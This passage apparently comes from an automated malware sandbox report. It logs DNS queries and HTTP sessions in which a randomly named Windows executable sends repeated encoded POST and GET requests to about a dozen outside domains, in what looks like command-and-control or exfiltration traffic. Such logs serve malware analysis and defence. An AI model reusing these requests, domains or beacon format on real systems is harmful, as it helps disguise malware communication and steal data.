                                                      Jul 3, 2024 17:59:46.859390020 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859400988 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859431028 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.859591961 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859605074 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859637976 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.951803923 CEST804977864.190.62.22192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 3, 2024 17:56:34.946772099 CEST | 192.168.2.6 | 1.1.1.1 | 0x8a30 | Standard query (0) | www.fondazionegtech.org | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:56:50.814649105 CEST | 192.168.2.6 | 1.1.1.1 | 0x3ebb | Standard query (0) | www.mengistiebethlehem.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:04.752461910 CEST | 192.168.2.6 | 1.1.1.1 | 0xd954 | Standard query (0) | www.ad14.fun | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:18.157937050 CEST | 192.168.2.6 | 1.1.1.1 | 0xf577 | Standard query (0) | www.epicbazaarhub.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:31.877427101 CEST | 192.168.2.6 | 1.1.1.1 | 0x4a8e | Standard query (0) | www.rz6grmvv.shop | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:46.158896923 CEST | 192.168.2.6 | 1.1.1.1 | 0xd8ec | Standard query (0) | www.hellokong.xyz | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:59.440041065 CEST | 192.168.2.6 | 1.1.1.1 | 0xa159 | Standard query (0) | www.architect-usschool.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:13.018013000 CEST | 192.168.2.6 | 1.1.1.1 | 0x4641 | Standard query (0) | www.easybackpage.net | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:26.508449078 CEST | 192.168.2.6 | 1.1.1.1 | 0x6e34 | Standard query (0) | www.superunicornpalace.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:41.862185955 CEST | 192.168.2.6 | 1.1.1.1 | 0x9980 | Standard query (0) | www.tedjp-x.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:42.874016047 CEST | 192.168.2.6 | 1.1.1.1 | 0x9980 | Standard query (0) | www.tedjp-x.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:56.504539967 CEST | 192.168.2.6 | 1.1.1.1 | 0xafa4 | Standard query (0) | www.3cubesinterior.in | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:59:16.424881935 CEST | 192.168.2.6 | 1.1.1.1 | 0x14cb | Standard query (0) | www.artvectorcraft.store | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:59:29.923494101 CEST | 192.168.2.6 | 1.1.1.1 | 0xcd5a | Standard query (0) | www.macklaer.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:59:38.252311945 CEST | 192.168.2.6 | 1.1.1.1 | 0x1830 | Standard query (0) | www.hondamechanic.today | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 3, 2024 17:56:35.040492058 CEST | 1.1.1.1 | 192.168.2.6 | 0x8a30 | No error (0) | www.fondazionegtech.org | sitestudio.it | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:56:35.040492058 CEST | 1.1.1.1 | 192.168.2.6 | 0x8a30 | No error (0) | sitestudio.it | | 89.31.76.10 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:56:51.050762892 CEST | 1.1.1.1 | 192.168.2.6 | 0x3ebb | No error (0) | www.mengistiebethlehem.com | | 208.91.197.13 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:04.769181967 CEST | 1.1.1.1 | 192.168.2.6 | 0xd954 | No error (0) | www.ad14.fun | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:04.769181967 CEST | 1.1.1.1 | 192.168.2.6 | 0xd954 | No error (0) | www.ad14.fun | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:18.650569916 CEST | 1.1.1.1 | 192.168.2.6 | 0xf577 | No error (0) | www.epicbazaarhub.com | epicbazaarhub.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:57:18.650569916 CEST | 1.1.1.1 | 192.168.2.6 | 0xf577 | No error (0) | epicbazaarhub.com | | 192.185.208.8 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:32.602283001 CEST | 1.1.1.1 | 192.168.2.6 | 0x4a8e | No error (0) | www.rz6grmvv.shop | | 121.254.178.230 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:46.189277887 CEST | 1.1.1.1 | 192.168.2.6 | 0xd8ec | No error (0) | www.hellokong.xyz | | 203.161.49.220 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:57:59.456058979 CEST | 1.1.1.1 | 192.168.2.6 | 0xa159 | No error (0) | www.architect-usschool.com | | 217.160.0.84 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:13.061901093 CEST | 1.1.1.1 | 192.168.2.6 | 0x4641 | No error (0) | www.easybackpage.net | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:58:13.061901093 CEST | 1.1.1.1 | 192.168.2.6 | 0x4641 | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:27.186599016 CEST | 1.1.1.1 | 192.168.2.6 | 0x6e34 | No error (0) | www.superunicornpalace.com | superunicornpalace.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:58:27.186599016 CEST | 1.1.1.1 | 192.168.2.6 | 0x6e34 | No error (0) | superunicornpalace.com | | 144.208.124.10 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:42.876082897 CEST | 1.1.1.1 | 192.168.2.6 | 0x9980 | No error (0) | www.tedjp-x.com | | 162.43.101.114 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:42.880778074 CEST | 1.1.1.1 | 192.168.2.6 | 0x9980 | No error (0) | www.tedjp-x.com | | 162.43.101.114 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:58:56.899667025 CEST | 1.1.1.1 | 192.168.2.6 | 0xafa4 | No error (0) | www.3cubesinterior.in | 3cubesinterior.in | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:58:56.899667025 CEST | 1.1.1.1 | 192.168.2.6 | 0xafa4 | No error (0) | 3cubesinterior.in | | 45.113.122.18 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:59:16.636112928 CEST | 1.1.1.1 | 192.168.2.6 | 0x14cb | No error (0) | www.artvectorcraft.store | ghs.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:59:16.636112928 CEST | 1.1.1.1 | 192.168.2.6 | 0x14cb | No error (0) | ghs.google.com | | 142.250.74.211 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:59:30.187005997 CEST | 1.1.1.1 | 192.168.2.6 | 0xcd5a | Server failure (2) | www.macklaer.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:59:38.278227091 CEST | 1.1.1.1 | 192.168.2.6 | 0x1830 | No error (0) | www.hondamechanic.today | | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49724 | 89.31.76.10 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:56:35.053853035 CEST | 352 | OUT | GET /jmiz/?Y6vp=3PLd8j&OdjTHtuX=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.fondazionegtech.org
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Jul 3, 2024 17:56:35.766567945 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Wed, 03 Jul 2024 15:56:35 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 1082
                                                      Connection: close
                                                      Cache-Control: max-age=0, private, must-revalidate, max-age=0, must-revalidate, no-cache, no-store, private
                                                      Location: https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&Y6vp=3PLd8j
                                                      Pragma: no-cache
                                                      Expires: Wed, 03 Jul 2024 15:56:35 GMT
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      Age: 0
                                                      X-Cache: MISS
                                                      X-BKSrc: 0.3
                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&amp;Y6vp=3PLd8j'" /> <title>Redirecting to https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&amp;Y6vp=3PLd8j</tit
Jul 3, 2024 17:56:35.766640902 CEST | 504 | IN
                                                      Data Ascii: le> </head> <body> Redirecting to <a href="https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8Tt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49727 | 208.91.197.13 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:56:51.064060926 CEST | 632 | OUT | POST /92z0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.mengistiebethlehem.com
                                                      Origin: http://www.mengistiebethlehem.com
                                                      Referer: http://www.mengistiebethlehem.com/92z0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=LeJA0Aalyl7fzjh0Qm/99MrEJPPzqxDK01CdpbwBOjeoXVtv1mRviucm/Nz9cexB1OyTTXkWMSdb9V7AuxIDYKk+7/Lk3oajc1i/48g2+1GSA/MnzlTDFmsvj2qJKsmBUGIL8vUdGS9Ufh2i79TpE124BXeuaW2KQxiATZ10/Dqsm2CcoudWRc1qGE7fOikCBjtxTKcs38Rs


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49728 | 208.91.197.13 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:56:53.603334904 CEST | 656 | OUT | POST /92z0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.mengistiebethlehem.com
                                                      Origin: http://www.mengistiebethlehem.com
                                                      Referer: http://www.mengistiebethlehem.com/92z0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=LeJA0Aalyl7fxAp0DRT91MrDFvPzgRDO01edpakvOVOoW0xvnXRvjucmrdz4S+wN1O/mTSEWMW1b9Q/AvDgEC6k4zfL1pYajc1i/480c+1eSAP8n1A/MLGsok2qJBMmFUGJo8uI3GQFUfhGi7sTuN12+L3e4div/dBvzb7Ziq0ukugDG0dd1DMVoGGjtOCkoDjVxBdQL4I0PltHiTo/Nb7ZUVj5JoEWhgg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49729 | 208.91.197.13 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:56:56.134558916 CEST | 1669 | OUT | POST /92z0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.mengistiebethlehem.com
                                                      Origin: http://www.mengistiebethlehem.com
                                                      Referer: http://www.mengistiebethlehem.com/92z0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49730 | 208.91.197.13 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:56:58.668369055 CEST | 355 | OUT | GET /92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.mengistiebethlehem.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Jul 3, 2024 17:56:59.619030952 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 03 Jul 2024 15:56:49 GMT
                                                      Server: Apache
                                                      Set-Cookie: vsid=925vr467567809662474819; expires=Mon, 02-Jul-2029 15:56:49 GMT; Max-Age=157680000; path=/; domain=www.mengistiebethlehem.com; HttpOnly
                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_EVkxnguzMv9Akqf/ch/CimlLaYBOfPYIJ1fRy0Es9A/5+vR5iOrIm1eOstGxJwvgY3jSXwVkbrZBkV8ac+TJ9w==
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      Connection: close
                                                      Jul 3, 2024 17:56:59.624519110 CEST1236INData Raw: 61 62 6c 65 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 74 63 66 61 70 69 4c 6f 63 61 74 6f 72 22
                                                      Data Ascii: abletcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!wi


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.6 | 49732 | 188.114.96.3 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:04.778712034 CEST | 590 | OUT | POST /oc7s/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.ad14.fun
                                                      Origin: http://www.ad14.fun
                                                      Referer: http://www.ad14.fun/oc7s/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:05.459671974 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 03 Jul 2024 15:57:05 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEyrw%2FrktxeN6EX%2Bz0MFvIUUNFHTM0627Zo66kDJJ06MZoxGbxTchE%2BYxEwYs5uJMuUlegADxHODKBxE4RWFfDcqCmDImMv4wdV0fUc3NqjH%2BHqaYjTc0LIT0tfJH4M%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d811bb7e810f9b-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.6 | 49733 | 188.114.96.3 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:07.320935965 CEST | 614 | OUT | POST /oc7s/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.ad14.fun
                                                      Origin: http://www.ad14.fun
                                                      Referer: http://www.ad14.fun/oc7s/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:08.029764891 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 03 Jul 2024 15:57:07 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMqQ%2F9UezL2FimQ9in7Hj12BBw40Pp%2BVq3aUwEPRUUuW9oS6FJ2jjY0DJocGHen2rx3EZe3G7G7Ius5fri4wZGqWJorEM4vO7GJUQqG%2FOLYsMKtxMLCK4yoqf6P3fG0%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d811cb582a183d-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.6 | 49734 | 188.114.96.3 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:09.883012056 CEST | 1627 | OUT | POST /oc7s/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.ad14.fun
                                                      Origin: http://www.ad14.fun
                                                      Referer: http://www.ad14.fun/oc7s/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:10.562294960 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 03 Jul 2024 15:57:10 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7et79ANId8Bpzw24eIVfvUrAjuo5Be37O9hqfjObgsg28XmfZOujEieEA4dr65QQyBhNTHHWQFoBdSx1bHhSGsICZUx2O%2FupHWrSxiEJvYrkHWvre1JxUApzMeEihug%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d811db4ad33350-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.6 | 49735 | 188.114.96.3 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:12.414638996 CEST | 341 | OUT | GET /oc7s/?Y6vp=3PLd8j&OdjTHtuX=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.ad14.fun
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:13.148091078 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 03 Jul 2024 15:57:13 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hn7R033%2FXgXO4zC42QbwHV85HvPXYg49COQM1i4B5MG5kryhvv4HTqQIYjFX%2By%2BjtgRiA1esJhUPM%2BKPd%2BHOfIN4GqQ%2FCpFUWqI1K5Sb2%2F%2FaEJfthOc%2B4bwUvHkkmLg%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d811eb1a5e4316-EWR
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.6 | 49736 | 192.185.208.8 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:18.692681074 CEST | 617 | OUT | POST /2769/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.epicbazaarhub.com
                                                      Origin: http://www.epicbazaarhub.com
                                                      Referer: http://www.epicbazaarhub.com/2769/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:19.343360901 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:19 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Vary: Accept-Encoding
                                                      Content-Encoding: gzip
                                                      Content-Length: 14879
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Ascii: u,Js0fjgRK.n2|2{n:%nX54..,[v)Af,}KXZ/I7{Xd(#umAfo";Z+9AV:LL|}-<FQvdxqipU[ArH Da)xKc/aEZ3X
                                                      Jul 3, 2024 17:57:19.344366074 CEST1236INData Raw: fc e9 97 1f ff fc be c8 fe 4e 40 8a 88 2d 93 67 2e c1 90 cf 3f 3f 72 5b af ad 71 1a a4 41 fe f1 0f 12 a1 29 8b 9c a9 e6 16 ea e4 7c 49 c3 e8 b0 1c fa 90 b4 5c 86 22 8f c0 b4 3f 98 36 da ce b6 27 20 23 a5 dd d5 3e ed 56 ca 65 eb 83 f9 c3 04 f4 a8
                                                      Data Ascii: N@-g.??r[qA)|I\"?6' #>VejukP/9='Yrl1_?qfN,|m6'ibsro9*c TxoMx\qa`=gYG4r{A,)"O^2J_[2
                                                      Jul 3, 2024 17:57:19.348368883 CEST1236INData Raw: 56 e7 50 23 c5 12 58 20 70 c5 c5 22 6a b7 37 1a 42 4b b0 10 0b 66 a3 da 65 6b 50 5b d2 e8 5c ac 69 74 5c bc bd 9b dd 39 9e ec a8 e1 b3 dc d8 6d 21 cd 4d c4 27 cf 5e 06 c1 45 18 3b 73 ac 6b 84 47 a3 5a aa 22 26 68 67 67 3d 05 2c 75 a6 a0 65 82 5b
                                                      Data Ascii: VP#X p"j7BKfekP[\it\9m!M'^E;skGZ"&hgg=,ue[f,XFjUEk)!N2!|jV}+,Z.*Y(Z<'Lxg#F.P;.X[vt/D`St!Di_{)/<_/H+$q7%


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.6 | 49737 | 192.185.208.8 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:21.227663994 CEST | 641 | OUT | POST /2769/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.epicbazaarhub.com
                                                      Origin: http://www.epicbazaarhub.com
                                                      Referer: http://www.epicbazaarhub.com/2769/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:21.863739014 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:21 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Vary: Accept-Encoding
